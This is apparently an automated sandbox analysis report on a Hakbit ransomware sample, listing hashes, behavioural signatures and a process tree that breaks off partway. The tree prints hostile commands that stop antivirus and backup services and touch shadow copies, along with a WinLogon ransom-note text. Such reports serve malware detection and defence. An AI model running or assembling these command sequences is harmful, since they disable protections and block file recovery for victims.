Analysis
-
max time kernel
139s -
max time network
97s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
18-06-2020 04:28
Static task
static1
Behavioral task
behavioral1
Sample
System.exe
Resource
win7v200430
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
System.exe
Resource
win10
windows10_x64
0 signatures
0 seconds
General
-
Target
System.exe
-
Size
66KB
-
MD5
8d6ab03994b0ce3466873aa7532fe76b
-
SHA1
156aecd4d8e65d205181ad5eace466c8798d3c86
-
SHA256
e5242266d9fc1e27e583a920ff6b9ff445c0942793ed80a92d5c5b6792d25f62
-
SHA512
2c1df9fb201b4a750378dfa7029755239167efa51ae4ddc9c5042218a1d01c3bf5557c09faeda4f3f68818082a6f95526d5776d432b5b6774ae2c1c90dc7a84c
Score
10/10
Malware Config
Signatures
-
Suspicious use of WriteProcessMemory 390 IoCs
description pid Process procid_target PID 1312 wrote to memory of 1480 1312 System.exe 24 PID 1312 wrote to memory of 1480 1312 System.exe 24 PID 1312 wrote to memory of 1480 1312 System.exe 24 PID 1480 wrote to memory of 544 1480 net.exe 26 PID 1480 wrote to memory of 544 1480 net.exe 26 PID 1480 wrote to memory of 544 1480 net.exe 26 PID 1312 wrote to memory of 1012 1312 System.exe 27 PID 1312 wrote to memory of 1012 1312 System.exe 27 PID 1312 wrote to memory of 1012 1312 System.exe 27 PID 1012 wrote to memory of 1612 1012 net.exe 29 PID 1012 wrote to memory of 1612 1012 net.exe 29 PID 1012 wrote to memory of 1612 1012 net.exe 29 PID 1312 wrote to memory of 240 1312 System.exe 30 PID 1312 wrote to memory of 240 1312 System.exe 30 PID 1312 wrote to memory of 240 1312 System.exe 30 PID 240 wrote to memory of 1068 240 net.exe 32 PID 240 wrote to memory of 1068 240 net.exe 32 PID 240 wrote to memory of 1068 240 net.exe 32 PID 1312 wrote to memory of 1088 1312 System.exe 33 PID 1312 wrote to memory of 1088 1312 System.exe 33 PID 1312 wrote to memory of 1088 1312 System.exe 33 PID 1088 wrote to memory of 1520 1088 net.exe 35 PID 1088 wrote to memory of 1520 1088 net.exe 35 PID 1088 wrote to memory of 1520 1088 net.exe 35 PID 1312 wrote to memory of 1668 1312 System.exe 36 PID 1312 wrote to memory of 1668 1312 System.exe 36 PID 1312 wrote to memory of 1668 1312 System.exe 36 PID 1668 wrote to memory of 1360 1668 net.exe 38 PID 1668 wrote to memory of 1360 1668 net.exe 38 PID 1668 wrote to memory of 1360 1668 net.exe 38 PID 1312 wrote to memory of 1764 1312 System.exe 39 PID 1312 wrote to memory of 1764 1312 System.exe 39 PID 1312 wrote to memory of 1764 1312 System.exe 39 PID 1764 wrote to memory of 1824 1764 net.exe 41 PID 1764 wrote to memory of 1824 1764 net.exe 41 PID 1764 wrote to memory of 1824 1764 net.exe 41 PID 1312 wrote to memory of 1836 1312 System.exe 42 PID 1312 wrote to memory of 1836 1312 System.exe 42 PID 1312 wrote to memory of 1836 1312 System.exe 42 PID 1836 wrote to memory of 1844 1836 net.exe 44 PID 1836 wrote to memory of 1844 1836 net.exe 44 PID 1836 wrote to memory of 1844 1836 net.exe 44 PID 1312 wrote to memory of 1788 1312 System.exe 45 PID 1312 wrote to memory of 1788 1312 System.exe 45 PID 1312 wrote to memory of 1788 1312 System.exe 45 PID 1788 wrote to memory of 1768 1788 net.exe 47 PID 1788 wrote to memory of 1768 1788 net.exe 47 PID 1788 wrote to memory of 1768 1788 net.exe 47 PID 1312 wrote to memory of 652 1312 System.exe 48 PID 1312 wrote to memory of 652 1312 System.exe 48 PID 1312 wrote to memory of 652 1312 System.exe 48 PID 652 wrote to memory of 864 652 net.exe 50 PID 652 wrote to memory of 864 652 net.exe 50 PID 652 wrote to memory of 864 652 net.exe 50 PID 1312 wrote to memory of 984 1312 System.exe 51 PID 1312 wrote to memory of 984 1312 System.exe 51 PID 1312 wrote to memory of 984 1312 System.exe 51 PID 984 wrote to memory of 616 984 net.exe 53 PID 984 wrote to memory of 616 984 net.exe 53 PID 984 wrote to memory of 616 984 net.exe 53 PID 1312 wrote to memory of 1316 1312 System.exe 54 PID 1312 wrote to memory of 1316 1312 System.exe 54 PID 1312 wrote to memory of 1316 1312 System.exe 54 PID 1316 wrote to memory of 1624 1316 net.exe 56 PID 1316 wrote to memory of 1624 1316 net.exe 56 PID 1316 wrote to memory of 1624 1316 net.exe 56 PID 1312 wrote to memory of 1592 1312 System.exe 57 PID 1312 wrote to memory of 1592 1312 System.exe 57 PID 1312 wrote to memory of 1592 1312 System.exe 57 PID 1592 wrote to memory of 1636 1592 net.exe 59 PID 1592 wrote to memory of 1636 1592 net.exe 59 PID 1592 wrote to memory of 1636 1592 net.exe 59 PID 1312 wrote to memory of 1620 1312 System.exe 60 PID 1312 wrote to memory of 1620 1312 System.exe 60 PID 1312 wrote to memory of 1620 1312 System.exe 60 PID 1620 wrote to memory of 1896 1620 net.exe 62 PID 1620 wrote to memory of 1896 1620 net.exe 62 PID 1620 wrote to memory of 1896 1620 net.exe 62 PID 1312 wrote to memory of 1948 1312 System.exe 63 PID 1312 wrote to memory of 1948 1312 System.exe 63 PID 1312 wrote to memory of 1948 1312 System.exe 63 PID 1948 wrote to memory of 1888 1948 net.exe 65 PID 1948 wrote to memory of 1888 1948 net.exe 65 PID 1948 wrote to memory of 1888 1948 net.exe 65 PID 1312 wrote to memory of 1892 1312 System.exe 66 PID 1312 wrote to memory of 1892 1312 System.exe 66 PID 1312 wrote to memory of 1892 1312 System.exe 66 PID 1892 wrote to memory of 1968 1892 net.exe 68 PID 1892 wrote to memory of 1968 1892 net.exe 68 PID 1892 wrote to memory of 1968 1892 net.exe 68 PID 1312 wrote to memory of 1980 1312 System.exe 69 PID 1312 wrote to memory of 1980 1312 System.exe 69 PID 1312 wrote to memory of 1980 1312 System.exe 69 PID 1980 wrote to memory of 2028 1980 net.exe 71 PID 1980 wrote to memory of 2028 1980 net.exe 71 PID 1980 wrote to memory of 2028 1980 net.exe 71 PID 1312 wrote to memory of 856 1312 System.exe 72 PID 1312 wrote to memory of 856 1312 System.exe 72 PID 1312 wrote to memory of 856 1312 System.exe 72 PID 856 wrote to memory of 1200 856 net.exe 74 PID 856 wrote to memory of 1200 856 net.exe 74 PID 856 wrote to memory of 1200 856 net.exe 74 PID 1312 wrote to memory of 1104 1312 System.exe 75 PID 1312 wrote to memory of 1104 1312 System.exe 75 PID 1312 wrote to memory of 1104 1312 System.exe 75 PID 1104 wrote to memory of 1484 1104 net.exe 77 PID 1104 wrote to memory of 1484 1104 net.exe 77 PID 1104 wrote to memory of 1484 1104 net.exe 77 PID 1312 wrote to memory of 1492 1312 System.exe 78 PID 1312 wrote to memory of 1492 1312 System.exe 78 PID 1312 wrote to memory of 1492 1312 System.exe 78 PID 1492 wrote to memory of 1572 1492 net.exe 80 PID 1492 wrote to memory of 1572 1492 net.exe 80 PID 1492 wrote to memory of 1572 1492 net.exe 80 PID 1312 wrote to memory of 836 1312 System.exe 81 PID 1312 wrote to memory of 836 1312 System.exe 81 PID 1312 wrote to memory of 836 1312 System.exe 81 PID 836 wrote to memory of 1612 836 net.exe 83 PID 836 wrote to memory of 1612 836 net.exe 83 PID 836 wrote to memory of 1612 836 net.exe 83 PID 1312 wrote to memory of 848 1312 System.exe 84 PID 1312 wrote to memory of 848 1312 System.exe 84 PID 1312 wrote to memory of 848 1312 System.exe 84 PID 848 wrote to memory of 324 848 net.exe 86 PID 848 wrote to memory of 324 848 net.exe 86 PID 848 wrote to memory of 324 848 net.exe 86 PID 1312 wrote to memory of 1064 1312 System.exe 87 PID 1312 wrote to memory of 1064 1312 System.exe 87 PID 1312 wrote to memory of 1064 1312 System.exe 87 PID 1064 wrote to memory of 1524 1064 net.exe 89 PID 1064 wrote to memory of 1524 1064 net.exe 89 PID 1064 wrote to memory of 1524 1064 net.exe 89 PID 1312 wrote to memory of 1376 1312 System.exe 90 PID 1312 wrote to memory of 1376 1312 System.exe 90 PID 1312 wrote to memory of 1376 1312 System.exe 90 PID 1376 wrote to memory of 1380 1376 net.exe 92 PID 1376 wrote to memory of 1380 1376 net.exe 92 PID 1376 wrote to memory of 1380 1376 net.exe 92 PID 1312 wrote to memory of 1816 1312 System.exe 93 PID 1312 wrote to memory of 1816 1312 System.exe 93 PID 1312 wrote to memory of 1816 1312 System.exe 93 PID 1816 wrote to memory of 1828 1816 net.exe 95 PID 1816 wrote to memory of 1828 1816 net.exe 95 PID 1816 wrote to memory of 1828 1816 net.exe 95 PID 1312 wrote to memory of 1792 1312 System.exe 96 PID 1312 wrote to memory of 1792 1312 System.exe 96 PID 1312 wrote to memory of 1792 1312 System.exe 96 PID 1792 wrote to memory of 1784 1792 net.exe 98 PID 1792 wrote to memory of 1784 1792 net.exe 98 PID 1792 wrote to memory of 1784 1792 net.exe 98 PID 1312 wrote to memory of 1768 1312 System.exe 99 PID 1312 wrote to memory of 1768 1312 System.exe 99 PID 1312 wrote to memory of 1768 1312 System.exe 99 PID 1768 wrote to memory of 568 1768 net.exe 101 PID 1768 wrote to memory of 568 1768 net.exe 101 PID 1768 wrote to memory of 568 1768 net.exe 101 PID 1312 wrote to memory of 368 1312 System.exe 102 PID 1312 wrote to memory of 368 1312 System.exe 102 PID 1312 wrote to memory of 368 1312 System.exe 102 PID 368 wrote to memory of 1516 368 net.exe 104 PID 368 wrote to memory of 1516 368 net.exe 104 PID 368 wrote to memory of 1516 368 net.exe 104 PID 1312 wrote to memory of 300 1312 System.exe 105 PID 1312 wrote to memory of 300 1312 System.exe 105 PID 1312 wrote to memory of 300 1312 System.exe 105 PID 300 wrote to memory of 1624 300 net.exe 107 PID 300 wrote to memory of 1624 300 net.exe 107 PID 300 wrote to memory of 1624 300 net.exe 107 PID 1312 wrote to memory of 1256 1312 System.exe 108 PID 1312 wrote to memory of 1256 1312 System.exe 108 PID 1312 wrote to memory of 1256 1312 System.exe 108 PID 1256 wrote to memory of 1600 1256 net.exe 110 PID 1256 wrote to memory of 1600 1256 net.exe 110 PID 1256 wrote to memory of 1600 1256 net.exe 110 PID 1312 wrote to memory of 1564 1312 System.exe 111 PID 1312 wrote to memory of 1564 1312 System.exe 111 PID 1312 wrote to memory of 1564 1312 System.exe 111 PID 1564 wrote to memory of 1568 1564 net.exe 113 PID 1564 wrote to memory of 1568 1564 net.exe 113 PID 1564 wrote to memory of 1568 1564 net.exe 113 PID 1312 wrote to memory of 1908 1312 System.exe 114 PID 1312 wrote to memory of 1908 1312 System.exe 114 PID 1312 wrote to memory of 1908 1312 System.exe 114 PID 1908 wrote to memory of 1900 1908 net.exe 116 PID 1908 wrote to memory of 1900 1908 net.exe 116 PID 1908 wrote to memory of 1900 1908 net.exe 116 PID 1312 wrote to memory of 1984 1312 System.exe 117 PID 1312 wrote to memory of 1984 1312 System.exe 117 PID 1312 wrote to memory of 1984 1312 System.exe 117 PID 1984 wrote to memory of 1972 1984 net.exe 119 PID 1984 wrote to memory of 1972 1984 net.exe 119 PID 1984 wrote to memory of 1972 1984 net.exe 119 PID 1312 wrote to memory of 2032 1312 System.exe 120 PID 1312 wrote to memory of 2032 1312 System.exe 120 PID 1312 wrote to memory of 2032 1312 System.exe 120 PID 2032 wrote to memory of 1100 2032 net.exe 122 PID 2032 wrote to memory of 1100 2032 net.exe 122 PID 2032 wrote to memory of 1100 2032 net.exe 122 PID 1312 wrote to memory of 1200 1312 System.exe 123 PID 1312 wrote to memory of 1200 1312 System.exe 123 PID 1312 wrote to memory of 1200 1312 System.exe 123 PID 1200 wrote to memory of 1488 1200 net.exe 125 PID 1200 wrote to memory of 1488 1200 net.exe 125 PID 1200 wrote to memory of 1488 1200 net.exe 125 PID 1312 wrote to memory of 1084 1312 System.exe 126 PID 1312 wrote to memory of 1084 1312 System.exe 126 PID 1312 wrote to memory of 1084 1312 System.exe 126 PID 1084 wrote to memory of 544 1084 net.exe 128 PID 1084 wrote to memory of 544 1084 net.exe 128 PID 1084 wrote to memory of 544 1084 net.exe 128 PID 1312 wrote to memory of 1060 1312 System.exe 129 PID 1312 wrote to memory of 1060 1312 System.exe 129 PID 1312 wrote to memory of 1060 1312 System.exe 129 PID 1060 wrote to memory of 1612 1060 net.exe 131 PID 1060 wrote to memory of 1612 1060 net.exe 131 PID 1060 wrote to memory of 1612 1060 net.exe 131 PID 1312 wrote to memory of 1616 1312 System.exe 132 PID 1312 wrote to memory of 1616 1312 System.exe 132 PID 1312 wrote to memory of 1616 1312 System.exe 132 PID 1312 wrote to memory of 1068 1312 System.exe 134 PID 1312 wrote to memory of 1068 1312 System.exe 134 PID 1312 wrote to memory of 1068 1312 System.exe 134 PID 1312 wrote to memory of 1092 1312 System.exe 136 PID 1312 wrote to memory of 1092 1312 System.exe 136 PID 1312 wrote to memory of 1092 1312 System.exe 136 PID 1312 wrote to memory of 1380 1312 System.exe 138 PID 1312 wrote to memory of 1380 1312 System.exe 138 PID 1312 wrote to memory of 1380 1312 System.exe 138 PID 1312 wrote to memory of 1852 1312 System.exe 140 PID 1312 wrote to memory of 1852 1312 System.exe 140 PID 1312 wrote to memory of 1852 1312 System.exe 140 PID 1312 wrote to memory of 1324 1312 System.exe 143 PID 1312 wrote to memory of 1324 1312 System.exe 143 PID 1312 wrote to memory of 1324 1312 System.exe 143 PID 1312 wrote to memory of 1000 1312 System.exe 145 PID 1312 wrote to memory of 1000 1312 System.exe 145 PID 1312 wrote to memory of 1000 1312 System.exe 145 PID 1312 wrote to memory of 1936 1312 System.exe 147 PID 1312 wrote to memory of 1936 1312 System.exe 147 PID 1312 wrote to memory of 1936 1312 System.exe 147 PID 1312 wrote to memory of 1116 1312 System.exe 151 PID 1312 wrote to memory of 1116 1312 System.exe 151 PID 1312 wrote to memory of 1116 1312 System.exe 151 PID 1312 wrote to memory of 780 1312 System.exe 153 PID 1312 wrote to memory of 780 1312 System.exe 153 PID 1312 wrote to memory of 780 1312 System.exe 153 PID 1312 wrote to memory of 744 1312 System.exe 155 PID 1312 wrote to memory of 744 1312 System.exe 155 PID 1312 wrote to memory of 744 1312 System.exe 155 PID 1312 wrote to memory of 1212 1312 System.exe 157 PID 1312 wrote to memory of 1212 1312 System.exe 157 PID 1312 wrote to memory of 1212 1312 System.exe 157 PID 1312 wrote to memory of 520 1312 System.exe 159 PID 1312 wrote to memory of 520 1312 System.exe 159 PID 1312 wrote to memory of 520 1312 System.exe 159 PID 1312 wrote to memory of 1624 1312 System.exe 161 PID 1312 wrote to memory of 1624 1312 System.exe 161 PID 1312 wrote to memory of 1624 1312 System.exe 161 PID 1312 wrote to memory of 1632 1312 System.exe 163 PID 1312 wrote to memory of 1632 1312 System.exe 163 PID 1312 wrote to memory of 1632 1312 System.exe 163 PID 1312 wrote to memory of 2028 1312 System.exe 165 PID 1312 wrote to memory of 2028 1312 System.exe 165 PID 1312 wrote to memory of 2028 1312 System.exe 165 PID 1312 wrote to memory of 212 1312 System.exe 167 PID 1312 wrote to memory of 212 1312 System.exe 167 PID 1312 wrote to memory of 212 1312 System.exe 167 PID 1312 wrote to memory of 1556 1312 System.exe 169 PID 1312 wrote to memory of 1556 1312 System.exe 169 PID 1312 wrote to memory of 1556 1312 System.exe 169 PID 1312 wrote to memory of 1044 1312 System.exe 171 PID 1312 wrote to memory of 1044 1312 System.exe 171 PID 1312 wrote to memory of 1044 1312 System.exe 171 PID 1312 wrote to memory of 1508 1312 System.exe 173 PID 1312 wrote to memory of 1508 1312 System.exe 173 PID 1312 wrote to memory of 1508 1312 System.exe 173 PID 1312 wrote to memory of 1524 1312 System.exe 175 PID 1312 wrote to memory of 1524 1312 System.exe 175 PID 1312 wrote to memory of 1524 1312 System.exe 175 PID 1312 wrote to memory of 1848 1312 System.exe 177 PID 1312 wrote to memory of 1848 1312 System.exe 177 PID 1312 wrote to memory of 1848 1312 System.exe 177 PID 1312 wrote to memory of 1600 1312 System.exe 179 PID 1312 wrote to memory of 1600 1312 System.exe 179 PID 1312 wrote to memory of 1600 1312 System.exe 179 PID 1312 wrote to memory of 608 1312 System.exe 181 PID 1312 wrote to memory of 608 1312 System.exe 181 PID 1312 wrote to memory of 608 1312 System.exe 181 PID 1312 wrote to memory of 236 1312 System.exe 183 PID 1312 wrote to memory of 236 1312 System.exe 183 PID 1312 wrote to memory of 236 1312 System.exe 183 PID 1312 wrote to memory of 1040 1312 System.exe 185 PID 1312 wrote to memory of 1040 1312 System.exe 185 PID 1312 wrote to memory of 1040 1312 System.exe 185 PID 1312 wrote to memory of 872 1312 System.exe 187 PID 1312 wrote to memory of 872 1312 System.exe 187 PID 1312 wrote to memory of 872 1312 System.exe 187 PID 1312 wrote to memory of 1612 1312 System.exe 189 PID 1312 wrote to memory of 1612 1312 System.exe 189 PID 1312 wrote to memory of 1612 1312 System.exe 189 PID 1312 wrote to memory of 1504 1312 System.exe 191 PID 1312 wrote to memory of 1504 1312 System.exe 191 PID 1312 wrote to memory of 1504 1312 System.exe 191 PID 1312 wrote to memory of 1804 1312 System.exe 193 PID 1312 wrote to memory of 1804 1312 System.exe 193 PID 1312 wrote to memory of 1804 1312 System.exe 193 PID 1312 wrote to memory of 1828 1312 System.exe 195 PID 1312 wrote to memory of 1828 1312 System.exe 195 PID 1312 wrote to memory of 1828 1312 System.exe 195 PID 1312 wrote to memory of 1932 1312 System.exe 197 PID 1312 wrote to memory of 1932 1312 System.exe 197 PID 1312 wrote to memory of 1932 1312 System.exe 197 PID 1312 wrote to memory of 216 1312 System.exe 199 PID 1312 wrote to memory of 216 1312 System.exe 199 PID 1312 wrote to memory of 216 1312 System.exe 199 PID 1312 wrote to memory of 1560 1312 System.exe 201 PID 1312 wrote to memory of 1560 1312 System.exe 201 PID 1312 wrote to memory of 1560 1312 System.exe 201 PID 1312 wrote to memory of 748 1312 System.exe 203 PID 1312 wrote to memory of 748 1312 System.exe 203 PID 1312 wrote to memory of 748 1312 System.exe 203 PID 1312 wrote to memory of 1080 1312 System.exe 205 PID 1312 wrote to memory of 1080 1312 System.exe 205 PID 1312 wrote to memory of 1080 1312 System.exe 205 PID 1312 wrote to memory of 1516 1312 System.exe 207 PID 1312 wrote to memory of 1516 1312 System.exe 207 PID 1312 wrote to memory of 1516 1312 System.exe 207 PID 1312 wrote to memory of 1056 1312 System.exe 209 PID 1312 wrote to memory of 1056 1312 System.exe 209 PID 1312 wrote to memory of 1056 1312 System.exe 209 PID 1312 wrote to memory of 1544 1312 System.exe 211 PID 1312 wrote to memory of 1544 1312 System.exe 211 PID 1312 wrote to memory of 1544 1312 System.exe 211 PID 1312 wrote to memory of 544 1312 System.exe 213 PID 1312 wrote to memory of 544 1312 System.exe 213 PID 1312 wrote to memory of 544 1312 System.exe 213 PID 1312 wrote to memory of 1696 1312 System.exe 215 PID 1312 wrote to memory of 1696 1312 System.exe 215 PID 1312 wrote to memory of 1696 1312 System.exe 215 PID 1312 wrote to memory of 1292 1312 System.exe 217 PID 1312 wrote to memory of 1292 1312 System.exe 217 PID 1312 wrote to memory of 1292 1312 System.exe 217 PID 1312 wrote to memory of 632 1312 System.exe 219 PID 1312 wrote to memory of 632 1312 System.exe 219 PID 1312 wrote to memory of 632 1312 System.exe 219 PID 1312 wrote to memory of 1108 1312 System.exe 221 PID 1312 wrote to memory of 1108 1312 System.exe 221 PID 1312 wrote to memory of 1108 1312 System.exe 221 PID 1312 wrote to memory of 1824 1312 System.exe 223 PID 1312 wrote to memory of 1824 1312 System.exe 223 PID 1312 wrote to memory of 1824 1312 System.exe 223 PID 1312 wrote to memory of 1308 1312 System.exe 225 PID 1312 wrote to memory of 1308 1312 System.exe 225 PID 1312 wrote to memory of 1308 1312 System.exe 225 PID 1312 wrote to memory of 232 1312 System.exe 227 PID 1312 wrote to memory of 232 1312 System.exe 227 PID 1312 wrote to memory of 232 1312 System.exe 227 PID 1312 wrote to memory of 1208 1312 System.exe 229 PID 1312 wrote to memory of 1208 1312 System.exe 229 PID 1312 wrote to memory of 1208 1312 System.exe 229 PID 1312 wrote to memory of 1008 1312 System.exe 231 PID 1312 wrote to memory of 1008 1312 System.exe 231 PID 1312 wrote to memory of 1008 1312 System.exe 231 PID 1312 wrote to memory of 1104 1312 System.exe 234 PID 1312 wrote to memory of 1104 1312 System.exe 234 PID 1312 wrote to memory of 1104 1312 System.exe 234 PID 1312 wrote to memory of 872 1312 System.exe 240 PID 1312 wrote to memory of 872 1312 System.exe 240 PID 1312 wrote to memory of 872 1312 System.exe 240 PID 1312 wrote to memory of 324 1312 System.exe 242 PID 1312 wrote to memory of 324 1312 System.exe 242 PID 1312 wrote to memory of 324 1312 System.exe 242 PID 1312 wrote to memory of 1292 1312 System.exe 247 PID 1312 wrote to memory of 1292 1312 System.exe 247 PID 1312 wrote to memory of 1292 1312 System.exe 247 PID 1312 wrote to memory of 364 1312 System.exe 248 PID 1312 wrote to memory of 364 1312 System.exe 248 PID 1312 wrote to memory of 364 1312 System.exe 248 PID 364 wrote to memory of 1104 364 cmd.exe 250 PID 364 wrote to memory of 1104 364 cmd.exe 250 PID 364 wrote to memory of 1104 364 cmd.exe 250 PID 364 wrote to memory of 1576 364 cmd.exe 252 PID 364 wrote to memory of 1576 364 cmd.exe 252 PID 364 wrote to memory of 1576 364 cmd.exe 252 PID 1312 wrote to memory of 324 1312 System.exe 253 PID 1312 wrote to memory of 324 1312 System.exe 253 PID 1312 wrote to memory of 324 1312 System.exe 253 PID 324 wrote to memory of 2012 324 cmd.exe 255 PID 324 wrote to memory of 2012 324 cmd.exe 255 PID 324 wrote to memory of 2012 324 cmd.exe 255 -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 1312 System.exe 1312 System.exe 1312 System.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 1292 notepad.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk System.exe -
Modifies WinLogon 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..." System.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "\r\n*** ATTENTION ***\r\nYour File Locked By \"Military Algorithm\" And Wiped. \r\nFor Recovery Your Files Contact : [email protected]" System.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 1312 System.exe 1312 System.exe 1312 System.exe 1292 notepad.exe -
Hakbit
Ransomware which encrypts files using AES, first seen in November 2019.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Modifies file permissions 1 TTPs 29 IoCs
pid Process 608 icacls.exe 232 icacls.exe 1104 icacls.exe 216 icacls.exe 1080 icacls.exe 1544 icacls.exe 1208 icacls.exe 544 icacls.exe 1612 icacls.exe 1932 icacls.exe 1516 icacls.exe 1056 icacls.exe 236 icacls.exe 1108 icacls.exe 1308 icacls.exe 324 icacls.exe 872 icacls.exe 1560 icacls.exe 748 icacls.exe 632 icacls.exe 1040 icacls.exe 1804 icacls.exe 1696 icacls.exe 1292 icacls.exe 872 icacls.exe 1504 icacls.exe 1828 icacls.exe 1824 icacls.exe 1008 icacls.exe -
Runs net.exe
-
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 1312 System.exe Token: SeDebugPrivilege 1852 taskkill.exe Token: SeDebugPrivilege 1324 taskkill.exe Token: SeDebugPrivilege 1000 taskkill.exe Token: SeBackupPrivilege 2004 vssvc.exe Token: SeRestorePrivilege 2004 vssvc.exe Token: SeAuditPrivilege 2004 vssvc.exe -
Deletes itself 1 IoCs
pid Process 324 cmd.exe -
Interacts with shadow copies 2 TTPs 14 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1632 vssadmin.exe 1044 vssadmin.exe 1116 vssadmin.exe 744 vssadmin.exe 1524 vssadmin.exe 780 vssadmin.exe 1212 vssadmin.exe 2028 vssadmin.exe 1556 vssadmin.exe 1508 vssadmin.exe 1936 vssadmin.exe 520 vssadmin.exe 1624 vssadmin.exe 212 vssadmin.exe -
Kills process with taskkill 3 IoCs
pid Process 1852 taskkill.exe 1324 taskkill.exe 1000 taskkill.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1104 PING.EXE -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies service 2 TTPs 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\System.exe"C:\Users\Admin\AppData\Local\Temp\System.exe"1⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of SendNotifyMessage
- Drops startup file
- Modifies WinLogon
- Suspicious use of FindShellTrayWindow
- Suspicious use of AdjustPrivilegeToken
PID:1312 -
C:\Windows\system32\net.exe"net.exe" stop avpsus /y2⤵
- Suspicious use of WriteProcessMemory
PID:1480 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop avpsus /y3⤵PID:544
-
-
-
C:\Windows\system32\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵
- Suspicious use of WriteProcessMemory
PID:1012 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y3⤵PID:1612
-
-
-
C:\Windows\system32\net.exe"net.exe" stop mfewc /y2⤵
- Suspicious use of WriteProcessMemory
PID:240 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfewc /y3⤵PID:1068
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BMR Boot Service /y2⤵
- Suspicious use of WriteProcessMemory
PID:1088 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y3⤵PID:1520
-
-
-
C:\Windows\system32\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵
- Suspicious use of WriteProcessMemory
PID:1668 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y3⤵PID:1360
-
-
-
C:\Windows\system32\net.exe"net.exe" stop DefWatch /y2⤵
- Suspicious use of WriteProcessMemory
PID:1764 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DefWatch /y3⤵PID:1824
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ccEvtMgr /y2⤵
- Suspicious use of WriteProcessMemory
PID:1836 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y3⤵PID:1844
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ccSetMgr /y2⤵
- Suspicious use of WriteProcessMemory
PID:1788 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y3⤵PID:1768
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SavRoam /y2⤵
- Suspicious use of WriteProcessMemory
PID:652 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SavRoam /y3⤵PID:864
-
-
-
C:\Windows\system32\net.exe"net.exe" stop RTVscan /y2⤵
- Suspicious use of WriteProcessMemory
PID:984 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RTVscan /y3⤵PID:616
-
-
-
C:\Windows\system32\net.exe"net.exe" stop QBFCService /y2⤵
- Suspicious use of WriteProcessMemory
PID:1316 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBFCService /y3⤵PID:1624
-
-
-
C:\Windows\system32\net.exe"net.exe" stop QBIDPService /y2⤵PID:1592
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBIDPService /y3⤵PID:1636
-
-
-
C:\Windows\system32\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y2⤵PID:1620
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y3⤵PID:1896
-
-
-
C:\Windows\system32\net.exe"net.exe" stop QBCFMonitorService /y2⤵PID:1948
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y3⤵PID:1888
-
-
-
C:\Windows\system32\net.exe"net.exe" stop YooBackup /y2⤵PID:1892
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooBackup /y3⤵PID:1968
-
-
-
C:\Windows\system32\net.exe"net.exe" stop YooIT /y2⤵PID:1980
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooIT /y3⤵PID:2028
-
-
-
C:\Windows\system32\net.exe"net.exe" stop zhudongfangyu /y2⤵PID:856
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y3⤵PID:1200
-
-
-
C:\Windows\system32\net.exe"net.exe" stop stc_raw_agent /y2⤵PID:1104
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y3⤵PID:1484
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VSNAPVSS /y2⤵PID:1492
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y3⤵PID:1572
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamTransportSvc /y2⤵PID:836
-
